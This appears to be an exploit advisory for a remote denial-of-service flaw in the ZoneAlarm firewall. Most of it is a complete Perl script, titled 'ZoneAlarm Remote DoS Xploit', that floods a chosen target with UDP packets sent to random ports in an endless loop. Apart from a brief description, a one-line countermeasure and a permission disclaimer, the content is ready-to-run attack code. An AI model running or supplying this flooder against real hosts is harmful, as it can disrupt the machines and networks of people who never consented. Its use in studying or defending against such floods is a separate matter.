ZoneAlarm was found vulnerable to a serious vulnerability leading to a remote Denial Of Service condition due to failure to handle udp random packets, if an attacker sends multiple udp packets to multiple ports 0-65000, the machine will hang up until the attacker stop flooding.

The following is a simple code written in perl to demonstrate that, the code is clean, it wont eat your cpu usage and it doesn't need to be run as root but you still have to use it at your own risk and on your own machine or remotly after you get permission.

Countermeasure: Shutdown your ZoneAlarm till you find the update.

#!/usr/bin/perl
use Socket;

system(clear);
print "\n";
print "--- ZoneAlarm Remote DoS Xploit\n";
print "---\n";
print "--- Discovered & Coded By _6mO_HaCk\n";
print "\n";
if(!defined($ARGV[0]))
{
&usage
}

my ($target);
$target=$ARGV[0];

my $ia = inet_aton($target) || die ("[-] Unable to resolve $target");

socket(DoS, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$target");

print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

for (;;) {
$size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand;
$port=int(rand 65000) +1;
send(DoS, 0, $size, sockaddr_in($port, $iaddr));
}
sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}